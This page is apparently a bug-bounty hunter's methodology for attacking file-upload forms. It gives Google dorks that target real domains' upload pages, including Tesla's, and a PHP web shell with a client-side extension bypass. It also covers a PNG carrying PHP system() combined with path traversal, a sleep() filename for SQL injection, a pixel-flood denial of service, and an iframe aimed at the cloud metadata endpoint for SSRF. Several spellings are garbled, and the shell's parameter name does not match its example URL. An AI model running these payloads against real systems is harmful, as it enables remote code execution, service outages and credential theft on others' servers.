My Hunting Approach on File Upload

Google Dork for find File Upload Foam

site:*.tesla.com | inurl:"uploadform"  intext:"choose file"
site:*.com inurl:"uploadform" 
site:*.com inurl:"uploadform" filetype:asp
1

Check file Upload to RCE:

Payload File : GitHub — flozz/p0wny-shell: Single-file PHP shell

  1. Upload a PHP Reverse Shell

  2. and Observe that witch PHP functions popen() system(), shell_exec(), passthuru() were disabled and enabled this php Application

  3. Craft Reverse Shell payload with that PHP function and save it into the file name shell.php if client-side validation to bypass it Shell.php.jpg

  4. intercept the file upload request in burpsuite and removed the .jpg extension and forwarded the file upload request to the server.

Pyload with that popen() PHP function:
---------
<?php$cmd = $_GET['cmd'];echo `$cmd`;?>
/uploadform/uploads/shell.php?code=echo%20%60id%60
2

File Upload and Path traversal to RCE

Upload using any attachment upload function png file, containing php code at its end. You can use the file png-transparent.png from the attachments. It is an empty PNG file with the following payload at its end:

<?php system("uname -a");?>

resend it modifying Filename with the system relative path to the uploaded file:

Filename=../../../../application/files/9316/1312/5391/png-transparent.png

Reload the page, and see the payload fired

3

Check filename and SVG file Upload to Stored-XSS:

4

File Upload to SQL injection

We can test for SQLi by using the filename as sleep(10)-- -.jpg and uploading the file. Once the file is uploaded, if the application shows a delay of mentioned time, the application is vulnerable to SQLi.

5

Check Upload to Pixie Flood Attack:

1- Download the image file from here.

2- Upload this image to the website you are testing on.

3- If the website’s server gets timed out, it means that the server is vulnerable

  1. Resize an image with 64250*64250px by going to https://www.resizepixel.com

  2. Observe the server's response after uploading the generated file.

  3. Confirm that the application can be accessed using another device. If the server takes too long to respond or is inaccessible, the application may be vulnerable to pixel flood attacks.

6

File Upload to SSRF:

Server-Side Request Forgery by using a file upload functionality that allows HTML or SVG files, using a URL, or by using various components. The SSRF may be internal, cloud-based, or simply external based on the situation.

Malicious Code
<body>
<iframe src="http://169.254.169.254/computeMetadata/v1/" width="500" height="500"></iframe>
</body>
PreviousFind LFI and Path TraversalNextMy Hunting Approach Step-2

Last updated